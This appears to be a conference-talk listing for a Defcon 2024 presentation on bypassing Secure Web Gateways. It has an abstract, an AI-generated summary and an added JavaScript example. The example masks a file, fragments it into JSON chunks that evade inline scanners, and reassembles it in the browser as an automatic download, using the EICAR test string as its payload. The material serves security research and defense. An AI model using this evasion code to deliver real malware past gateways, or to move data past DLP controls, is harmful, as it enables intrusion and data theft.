Breaking Secure Web Gateways (SWG) for Fun and Profit

By Vivek Ramachandran, Jeswin Mathai on 09 Aug 2024 @ Defcon
#swg #cloud-access-security-broker #application-pentesting #security-testing #threat-modeling #network-architecture #secure-development
Focus Areas: 📞 Telecommunications Security , 🔐 Application Security , ☁️ Cloud Security , ⚙️ DevSecOps , 🌐 Network Security , 🏗️ Security Architecture

Abstract

Secure Web Gateways (SWGs) are cloud-based SSL-intercepting proxies and an important component of enterprise Secure Access Service Edge (SASE) or Security Service Edge (SSE) solutions. SWGs ensure secure web access for enterprise users by providing malware protection, threat prevention, URL filtering, and content inspection of sensitive data, among other critical security measures.

Our research indicates that in today's world of complex web applications and protocols, SWGs often fail to deliver on their promise. We will demonstrate a new class of attacks, "Last Mile Reassembly Attacks," which, as of this writing, can bypass every SWG in the Gartner Magic Quadrant for SASE and SSE; this includes the largest public market cybersecurity companies in the world. Additionally, we will release an open-source attack toolkit for researchers and red teams to test these attacks against their security solutions and better understand their security exposure.

We aim for our talk to compel SWG vendors to rethink cloud-based client-side web attack detection models, and for enterprises to rethink how they look at securing their users against web threats.

AI Generated Summary

The talk presented architectural weaknesses in Secure Web Gateways (SWGs) that allow a complete bypass of their malware and file-based threat detection. An SWG is a cloud proxy that inspects enterprise traffic in transit, so it sees only the bytes on the wire, never the browser context that gives those bytes meaning: tab state, DOM changes, and user interaction. This fundamental limitation, combined with cloud processing constraints such as file size limits and weak archive scanning, creates a detection gap between what the proxy scans and what the browser finally executes or saves.

The researchers demonstrated several attack classes that exploit this gap. Channels the gateway does not inspect (WebRTC, WebSockets, gRPC, Server-Sent Events) carry malicious payloads straight past it. Last Mile Reassembly attacks fragment, encode, encrypt, or embed a malicious file across multiple network requests or inside benign-looking resources (WebAssembly modules, images via steganography, CSS/JS/SVG variables, HTML embeds), so that no single response the proxy sees is recognisable as a file. The browser reassembles the payload client-side and hands it to the user as a normal "click-to-download" experience, indistinguishable from a legitimate download. The same idea works in the upload direction: a file is disassembled into non-file data streams before it leaves the browser, so DLP rules that look for files in uploads never match.
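As an added example (not code from the talk or from the browser.security toolkit), the following JavaScript models the download and upload variants described above in one flow: a payload is masked, split into numbered JSON chunks of the kind a proxy would see as ordinary API traffic, and then rebuilt on the client. The chunk framing, the XOR mask, the key, the sample payload and the function names are assumptions made for this illustration. The EICAR test string stands in for "known malware" so that a plain signature check can be run on every fragment and on the rebuilt file, showing where a one-response-at-a-time scanner does and does not match.

```javascript
// Added example, not code from the talk or from the browser.security toolkit.
// Models one "last mile reassembly" flow: a payload is masked, split into
// numbered JSON chunks (what a proxy sees), then rebuilt in the browser.
// Chunk framing, XOR mask and key are assumptions made for this illustration.

// EICAR anti-malware test string: scanners are expected to flag any file that
// contains it, so it stands in for "known malware" without being malicious.
const EICAR = 'X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*';

// Constructed sample file: the test string padded so it spans several chunks.
const PAYLOAD = Buffer.from('constructed-prefix:' + EICAR + ':constructed-suffix', 'latin1');

// Assumed shared secret: in a real delivery the key would arrive in the page's
// own JavaScript or a CSS variable, i.e. in yet another innocuous response.
const KEY = Buffer.from('illustrative-key');

// Symmetric byte mask; applying it twice restores the input.
function xorMask(buf, key) {
  const out = Buffer.alloc(buf.length);
  for (let i = 0; i < buf.length; i++) out[i] = buf[i] ^ key[i % key.length];
  return out;
}

// Sender side: mask, then slice into numbered chunks wrapped as JSON "API
// responses". No single response carries a recognisable file. The same
// function models the upload direction (file -> non-file data streams).
function fragment(buf, key, chunkSize) {
  const masked = xorMask(buf, key);
  const total = Math.ceil(masked.length / chunkSize);
  const responses = [];
  for (let seq = 0; seq < total; seq++) {
    const slice = masked.subarray(seq * chunkSize, (seq + 1) * chunkSize);
    responses.push(JSON.stringify({ seq, total, data: slice.toString('base64') }));
  }
  return responses;
}

// Proxy model: a signature scanner that sees one response body at a time and
// keeps no state across requests, which is the position an SWG is in.
function inlineScannerFlags(responseText) {
  return responseText.includes(EICAR);
}

// Receiver side (browser): order by sequence number, decode, unmask, rebuild.
// An incomplete transfer is an error rather than a silently truncated file.
function reassemble(responses, key) {
  const parts = responses.map(r => JSON.parse(r)).sort((a, b) => a.seq - b.seq);
  if (parts.length === 0 || parts.length !== parts[0].total) throw new Error('incomplete transfer');
  const masked = Buffer.concat(parts.map(p => Buffer.from(p.data, 'base64')));
  return xorMask(masked, key);
}

// Browser-only last step: present the rebuilt bytes as an ordinary download.
// Returns false outside a browser so the rest of the model still runs in Node.
function triggerDownload(bytes, filename) {
  if (typeof document === 'undefined') return false;
  const url = URL.createObjectURL(new Blob([bytes], { type: 'application/octet-stream' }));
  const a = document.createElement('a');
  a.href = url;
  a.download = filename;
  document.body.appendChild(a);
  a.click();
  a.remove();
  URL.revokeObjectURL(url);
  return true;
}

// End-to-end run: chunks are delivered out of order to show that the client,
// not the wire, determines the final file.
function runModel(chunkSize = 16) {
  const responses = fragment(PAYLOAD, KEY, chunkSize).reverse();
  const rebuilt = reassemble(responses, KEY);
  return {
    responses: responses.length,
    flaggedInTransit: responses.filter(inlineScannerFlags).length,
    flaggedAfterReassembly: inlineScannerFlags(rebuilt.toString('latin1')),
    intact: rebuilt.equals(PAYLOAD),
    downloaded: triggerDownload(rebuilt, 'rebuilt.bin'),
  };
}
```

Run under Node, `runModel()` reports seven responses, none of which the in-line scanner flags, while the rebuilt buffer both matches the signature and is byte-for-byte the original. To turn this into a check against a real gateway, serve the JSON responses from a test host behind the proxy and confirm whether the endpoint ends up with a file whose bytes match the EICAR test file; the proxy's verdict on each individual response is exactly the number the page's argument is about.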

Because the flaw is architectural rather than a software bug, SWG service level agreements that promise prevention of all known malware are, in practice, not achievable: a cloud proxy cannot inspect what happens after the proxy, on the client, once the fragments are reassembled and executed. The practical implication is that enterprises relying solely on SWGs for threat prevention have a false sense of security; an SWG verdict covers the bytes it saw on the wire, not the file the browser eventually produces. Effective mitigation requires endpoint-integrated security with direct browser visibility, so that the final execution context and the reassembled payload can be monitored. All demonstrated bypasses worked against major SWG vendors in the Gartner Magic Quadrant. Code and testable demos were released via an open-source platform (browser.security).

Disclaimer: This summary was auto-generated from the video transcript using AI and may contain inaccuracies. It is intended as a quick overview; always refer to the original talk for authoritative content.